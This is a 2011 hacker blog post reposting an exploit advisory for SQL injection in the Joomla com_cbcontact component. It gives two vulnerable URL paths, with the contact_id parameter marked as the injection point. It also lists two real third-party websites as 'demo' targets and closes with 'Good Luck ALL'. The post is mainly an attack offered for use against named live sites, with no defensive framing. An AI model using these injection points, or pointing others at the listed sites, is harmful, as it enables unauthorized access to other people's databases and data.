Post Your Wish

Monday, May 16, 2011

Joomla Component (com_cbcontact) SQL Injection Vulnerabilities

###
# Title : Joomla Component (com_cbcontact) SQL Injection Vulnerabilities
# Author : Tringle2011
# E-mail : andrew.nile@gmail.com
# platform : php
# Impact : Multiple SQL Injection Vulnerabilities
# Tested on : Windows XP sp3 & Linux.(Ubuntu 10.10) En
###

###

# (+) Exploit & PoC :

/index.php?option=com_cbcontact&task=vcard&contact_id=-11[SQLi]
/index.php?option=com_cbcontact&task=view&contact_id=-11[SQLi]

# (!) Demo :

http://www.thic.dk/ntu/index2.php?option=com_cbcontact&task=vcard&contact_id=-11
http://www.cfc-indonesia.org/index.php?option=com_cbcontact&task=view&contact_id=-11

# (^_^) ! Good Luck ALL ...
Posted by The Hackers Forever at 11:52 PM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)